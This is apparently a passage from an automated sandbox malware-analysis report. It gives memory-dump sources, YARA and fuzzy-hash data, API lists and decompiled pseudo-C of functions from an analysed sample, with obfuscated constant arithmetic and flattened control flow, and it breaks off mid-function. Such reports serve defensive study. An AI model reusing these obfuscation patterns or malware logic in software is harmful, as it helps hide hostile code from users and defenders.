                                              0x00231963
                                              0x002319fc
                                              0x00231a01
                                              0x00231a04
                                              0x00231a09
                                              0x00231a09
                                              0x00231a16
                                              0x00231a1e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                              • API String ID: 0-656425227
                                              • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                              • Instruction ID: b11a4c2d856b10af2c759e527eb0380ad501c71361e4b7d0a3a6a38043b2d59a
                                              • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                              • Instruction Fuzzy Hash: F36121B11093429FD754CF60C89992BFBE1BBD5788F104A1DF69696260C3B5CA18CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                              • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                              • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                              • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                              • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                              • CoTaskMemFree.OLE32(?), ref: 100027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                              • String ID: o
                                              • API String ID: 207024522-3306556724
                                              • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                              • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                              • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                              • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00232B16, Relevance: 11.6, Strings: 9, Instructions: 329COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00232B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0023889D(0x23c0b0, _v1756, __eflags);
									_pop(_t360);
									E0022C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00232B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00232025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0022595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00237BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0023889D(0x23c090, _v1736, __eflags));
							_t346 = E00232025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0022109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00221B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}


























































                                              0x00232b1f
                                              0x00232b26
                                              0x00232b2d
                                              0x00232b34
                                              0x00232b3b
                                              0x00232b43
                                              0x00232b44
                                              0x00232b49
                                              0x00232b54
                                              0x00232b5d
                                              0x00232b64
                                              0x00232b69
                                              0x00232b6f
                                              0x00232b77
                                              0x00232b7f
                                              0x00232b87
                                              0x00232b8f
                                              0x00232b97
                                              0x00232b9f
                                              0x00232ba7
                                              0x00232baf
                                              0x00232bb7
                                              0x00232bbf
                                              0x00232bc7
                                              0x00232bcf
                                              0x00232bd4
                                              0x00232bd9
                                              0x00232be1
                                              0x00232be9
                                              0x00232bf1
                                              0x00232bf9
                                              0x00232c01
                                              0x00232c09
                                              0x00232c0e
                                              0x00232c16
                                              0x00232c1e
                                              0x00232c29
                                              0x00232c34
                                              0x00232c3f
                                              0x00232c4c
                                              0x00232c4f
                                              0x00232c53
                                              0x00232c60
                                              0x00232c64
                                              0x00232c6c
                                              0x00232c77
                                              0x00232c7f
                                              0x00232c8a
                                              0x00232c92
                                              0x00232c9a
                                              0x00232ca2
                                              0x00232caa
                                              0x00232cb2
                                              0x00232cba
                                              0x00232cc6
                                              0x00232cc9
                                              0x00232ccd
                                              0x00232cd5
                                              0x00232cdd
                                              0x00232ce5
                                              0x00232ced
                                              0x00232cfa
                                              0x00232cfe
                                              0x00232d06
                                              0x00232d10
                                              0x00232d18
                                              0x00232d1d
                                              0x00232d25
                                              0x00232d2d
                                              0x00232d3b
                                              0x00232d40
                                              0x00232d46
                                              0x00232d52
                                              0x00232d55
                                              0x00232d59
                                              0x00232d61
                                              0x00232d6e
                                              0x00232d72
                                              0x00232d7a
                                              0x00232d7f
                                              0x00232d87
                                              0x00232d92
                                              0x00232d9a
                                              0x00232da5
                                              0x00232dad
                                              0x00232db7
                                              0x00232dbb
                                              0x00232dc3
                                              0x00232dcb
                                              0x00232dd3
                                              0x00232ddb
                                              0x00232de3
                                              0x00232deb
                                              0x00232df6
                                              0x00232e01
                                              0x00232e0c
                                              0x00232e14
                                              0x00232e1c
                                              0x00232e21
                                              0x00232e29
                                              0x00232e31
                                              0x00232e3e
                                              0x00232e47
                                              0x00232e4b
                                              0x00232e53
                                              0x00232e5b
                                              0x00232e60
                                              0x00232e64
                                              0x00232e6c
                                              0x00232e74
                                              0x00232e7c
                                              0x00232e86
                                              0x00232e8a
                                              0x00232e92
                                              0x00232e9a
                                              0x00232e9f
                                              0x00232ea7
                                              0x00232eaf
                                              0x00232eb7
                                              0x00232ec4
                                              0x00232ec8
                                              0x00232ed0
                                              0x00232ed8
                                              0x00232ee0
                                              0x00232ee8
                                              0x00232ef0
                                              0x00232ef8
                                              0x00232f00
                                              0x00232f08
                                              0x00232f10
                                              0x00232f18
                                              0x00232f1f
                                              0x00232f29
                                              0x00232f2e
                                              0x00232f36
                                              0x00232f3e
                                              0x00232f48
                                              0x00232f4c
                                              0x00232f54
                                              0x00232f5c
                                              0x00232f64
                                              0x00232f6c
                                              0x00232f7a
                                              0x00232f7e
                                              0x00232f82
                                              0x00232f8a
                                              0x00232f8a
                                              0x00232f8c
                                              0x00000000
                                              0x00232f8d
                                              0x00232f9f
                                              0x002330a3
                                              0x002330aa
                                              0x00233193
                                              0x0023319e
                                              0x002331a0
                                              0x00233094
                                              0x00233094
                                              0x00232f8a
                                              0x00232f8a
                                              0x00232f8c
                                              0x00000000
                                              0x00232f8c
                                              0x00232f8a
                                              0x002330b0
                                              0x002330b8
                                              0x002330e1
                                              0x002330e1
                                              0x002330e9
                                              0x002330eb
                                              0x002330f8
                                              0x002330fd
                                              0x0023312e
                                              0x0023315f
                                              0x00233164
                                              0x00233175
                                              0x0023317e
                                              0x0023317e
                                              0x002330da
                                              0x002330da
                                              0x00000000
                                              0x002330da
                                              0x002330ba
                                              0x002330c3
                                              0x00000000
                                              0x00000000
                                              0x002330c5
                                              0x002330cd
                                              0x00000000
                                              0x00000000
                                              0x002330cf
                                              0x002330d8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002330d8
                                              0x00232fa7
                                              0x00233081
                                              0x0023308c
                                              0x0023308e
                                              0x0023308e
                                              0x00000000
                                              0x0023308e
                                              0x00232fb3
                                              0x0023300c
                                              0x00233044
                                              0x0023305d
                                              0x00233062
                                              0x00233065
                                              0x00232f8a
                                              0x00232f8a
                                              0x00232f8c
                                              0x00000000
                                              0x00232f8c
                                              0x00232f8a
                                              0x00232fbb
                                              0x00233005
                                              0x00000000
                                              0x00233005
                                              0x00232fc3
                                              0x002331cc
                                              0x002331cc
                                              0x002331d2
                                              0x00000000
                                              0x00000000
                                              0x002331e1
                                              0x002331e1
                                              0x002331e1
                                              0x00232feb
                                              0x00232ff0
                                              0x00232ff2
                                              0x00232ff8
                                              0x00000000
                                              0x00000000
                                              0x00232ffe
                                              0x00000000
                                              0x00232ffe
                                              0x002331bc
                                              0x002331c1
                                              0x002331c4
                                              0x002331cb
                                              0x00000000
                                              0x002331cb

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                              • API String ID: 0-983689062
                                              • Opcode ID: 3d071cf582f05614619fa7d835275f0f0a7ac06857365cff3d79a8ba7f38d41c
                                              • Instruction ID: 8f869d699ce5bafa2fa4ff4642aedf921f478db2a9fda1f07ae69ff4781602bb
                                              • Opcode Fuzzy Hash: 3d071cf582f05614619fa7d835275f0f0a7ac06857365cff3d79a8ba7f38d41c
                                              • Instruction Fuzzy Hash: 0BF122B15183819FD368CF61C549A5FFBF1BBC4308F108A1DF29A862A0D7B58A59CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002288E5, Relevance: 11.5, Strings: 9, Instructions: 298COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 99%
                                              			E002288E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00230D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002229E3(_t382 + 0x2b0, 0x104, E0023889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00232025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
